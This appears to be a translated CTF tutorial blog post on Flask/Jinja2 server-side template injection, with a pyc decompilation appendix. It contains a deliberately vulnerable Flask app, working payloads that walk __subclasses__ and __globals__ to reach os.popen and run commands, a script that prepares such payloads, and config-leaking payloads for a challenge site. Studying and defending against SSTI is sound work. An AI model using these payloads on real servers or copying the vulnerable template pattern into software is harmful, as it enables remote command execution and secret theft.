SSTI template injection explanation and real problem practice
2022-07-06 03:47:00 【Advertising fever】
0x00 SSTI
1. What is SSTI?
SSTI (Server-Side Template Injection) arises when user input reaches the server-side template engine as part of the template itself rather than as data passed to it. If that input is not filtered, an attacker can craft template syntax that the engine evaluates, which in practice means reading files or getting a shell. Most SSTI challenges in current CTFs target Python template engines (Jinja2 behind Flask in particular).
2. Causes and exploitation conditions
A web application renders its output pages by combining data with a template framework. The data in the database does not change; the template decides how it is presented, and the same data can be rendered in many different ways to give different visual results. When the template contains attacker-controllable parameters, or when the template code exposes debugging features, SSTI becomes possible. This class of injection exists for most scripting languages; in CTFs Python is the most common target.
3. What are the hazards?
File reading, command execution, code execution, and so on.
Payload analysis reference:
0x01 Understanding SSTI through a case
Sensitive function keywords:
flask
render_template_string
Python case:
from flask import Flask
from flask import request
from flask import render_template_string

app = Flask(__name__)
app.config['SECRET_KEY'] = "flag{SSTI_123456}"

@app.route('/')
def hello_world():
    return 'Hello World!'

@app.errorhandler(404)
def page_not_found(e):
    # Vulnerable on purpose: the 404_url query parameter is spliced into the
    # template source with %-formatting, so any Jinja2 syntax it contains is
    # evaluated by render_template_string. (%% becomes a literal % after
    # formatting, giving {% block body %} / {% endblock %}.)
    template = '''
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>%s</h3>
</div>
{%% endblock %%}
''' % (request.args.get('404_url'))
    return render_template_string(template), 404

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True)
Run the script and request any non-existent path with a 404_url parameter: the value is rendered as template code, so /abc?404_url={{7*7}} returns 49 in the page, confirming the injection. The fix is to keep user input out of the template source and pass it as context instead (render_template_string(template, url=...) with {{ url }} in the template), so the engine escapes it as data.
With the right payload this becomes RCE: reading files and operating the machine.
The payloads below reach popen through the os._wrap_close class: its __init__ is defined in os.py, so __init__.__globals__ is the os module namespace, which contains popen.
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__.popen('whoami').read()
The index 128 is specific to the target's Python build and the modules it has loaded; dump __subclasses__() first and locate os._wrap_close by name before relying on a fixed index. The second form only works inside Jinja2, where attribute access on a dict falls back to item lookup; in plain Python, __globals__.popen raises AttributeError.
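The following is an added example and not code from the original post. It performs the same object walk as the payloads above in plain Python, but resolves the os._wrap_close position by class name instead of trusting the hard-coded index 128, and checks that the chain really ends at os.popen without executing any command. The function names are my own; only the gadget chain itself comes from the payloads.

```python
# Added example, not code from the original post: resolve the os._wrap_close
# gadget by name rather than a fixed index, and verify the chain reaches
# os.popen without running a command. Function names are illustrative.
import os


def object_subclasses():
    """Same starting point as the payload: "" -> str -> object -> every loaded class."""
    return "".__class__.__bases__[0].__subclasses__()


def find_subclass_index(name):
    """Index of the first loaded class named `name`, or -1 if it is not loaded.
    The position depends on the Python version and on which modules are imported,
    which is why a fixed index such as 128 breaks between targets."""
    for index, cls in enumerate(object_subclasses()):
        if cls.__name__ == name:
            return index
    return -1


def gadget_expression():
    """Payload prefix with the index resolved on this interpreter, ending at the
    popen object. Appending ('whoami').read() gives the full payload from the text."""
    index = find_subclass_index("_wrap_close")
    if index < 0:
        raise LookupError("os._wrap_close is not loaded in this interpreter")
    return ('"".__class__.__bases__[0].__subclasses__()[%d]'
            ".__init__.__globals__['popen']" % index)


def popen_via_gadget():
    """Walk the chain as objects: class -> __init__ -> __globals__ -> popen.
    __init__ is a function defined in os.py, so __globals__ is the os module
    namespace; the same __globals__ step is what the url_for payloads later use."""
    index = find_subclass_index("_wrap_close")
    if index < 0:
        raise LookupError("os._wrap_close is not loaded in this interpreter")
    cls = object_subclasses()[index]
    return cls.__init__.__globals__["popen"]


if __name__ == "__main__":
    print("os._wrap_close index on this interpreter:", find_subclass_index("_wrap_close"))
    print(gadget_expression())
    print(popen_via_gadget() is os.popen)  # True
```

Evaluating gadget_expression() yields the os.popen function object itself; the only thing the real payload adds is the call. Run the script against the same Python version as the target when preparing a payload, since the index it prints is what replaces 128.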
0x02 CTF case study
https://buuoj.cn/
Challenge page:
Submitting {{2*2}} under /shrine/ returns 4, so the path segment is rendered as a template and SSTI exists.
The payload walks a function's __globals__ (the namespace of the module that defined it) to reach the Flask config, which is useful when the direct {{config}} reference is not available:
url_for() builds the URL for a given view function
get_flashed_messages() retrieves the messages passed with flash()
Both are Flask helpers exported into every Jinja2 context, and both are defined in a Flask module whose globals include current_app.
Get the global variables:
/shrine/{{url_for.__globals__}}
or
/shrine/{{get_flashed_messages.__globals__}}
Use current_app from those globals to read the config:
/shrine/{{url_for.__globals__['current_app'].config}}
or
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}
Supplement: pyc decompilation
pyc is another form of script packaging, comparable to
aspx: DLL files
java: .class/.jar/.war files
pyc is a decompilable bytecode package; there are also harder-to-decompile formats such as pyd files (compiled extension modules).
pyc decompilation references:
Online decompilers:
https://tool.lu/pyc/
http://tools.bugscaner.com/decompyle/
Decompiler: https://github.com/wibiti/uncompyle2
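As an added example (not from the original post or any of the tools linked above), the script below parses a .pyc by hand and pulls the string constants out of the marshalled code object, which is the first thing worth checking before reaching for a full decompiler. It compiles a constructed sample source of its own, so it runs offline; it assumes Python 3.7 or newer, where the pyc header is the 16-byte PEP 552 layout.

```python
# Added example, not from the original post: parse a .pyc header and extract
# strings from the marshalled code object. Assumes Python 3.7+ (16-byte header).
import dis
import importlib.util
import marshal
import os
import py_compile
import struct
import tempfile

# Constructed sample source, standing in for a challenge's compiled script.
SAMPLE_SOURCE = (
    "SECRET = 'flag{constructed_example}'\n"
    "def check(key):\n"
    "    return key == SECRET\n"
)


def compile_sample(tmpdir):
    """Write the sample source and compile it to sample.pyc; returns the pyc path."""
    src = os.path.join(tmpdir, "sample.py")
    with open(src, "w") as f:
        f.write(SAMPLE_SOURCE)
    return py_compile.compile(src, cfile=os.path.join(tmpdir, "sample.pyc"), doraise=True)


def parse_pyc(path):
    """Split a pyc into its 16-byte header and the code object that follows it."""
    with open(path, "rb") as f:
        data = f.read()
    magic = data[:4]
    if magic != importlib.util.MAGIC_NUMBER:
        # A pyc can only be loaded (or reliably decompiled) with a matching Python minor version.
        raise ValueError("pyc magic %r does not match this interpreter" % magic)
    (flags,) = struct.unpack("<I", data[4:8])
    header = {"magic": magic, "flags": flags}
    if flags & 1:  # hash-based pyc (PEP 552)
        header["source_hash"] = data[8:16]
    else:  # timestamp-based pyc
        header["mtime"], header["source_size"] = struct.unpack("<II", data[8:16])
    return header, marshal.loads(data[16:])


def string_constants(code):
    """Recursively collect string constants from a code object and its nested functions."""
    found = []
    for const in code.co_consts:
        if isinstance(const, str):
            found.append(const)
        elif hasattr(const, "co_consts"):
            found.extend(string_constants(const))
    return found


def analyse_sample():
    """Compile the sample, parse it, and return (header, function names, strings)."""
    with tempfile.TemporaryDirectory() as tmpdir:
        header, code = parse_pyc(compile_sample(tmpdir))
    functions = [c.co_name for c in code.co_consts if hasattr(c, "co_code")]
    return header, functions, string_constants(code)


if __name__ == "__main__":
    header, functions, strings = analyse_sample()
    print(header)
    print("functions:", functions)
    print("strings:", strings)
    with tempfile.TemporaryDirectory() as tmpdir:
        # Bytecode listing: roughly what a decompiler works from as its first pass.
        dis.dis(parse_pyc(compile_sample(tmpdir))[1])
```

To use this on a real file, call parse_pyc on it directly: if the magic check fails, run the script under the Python version the magic belongs to, which is the same constraint the online decompilers impose when they ask for the Python version.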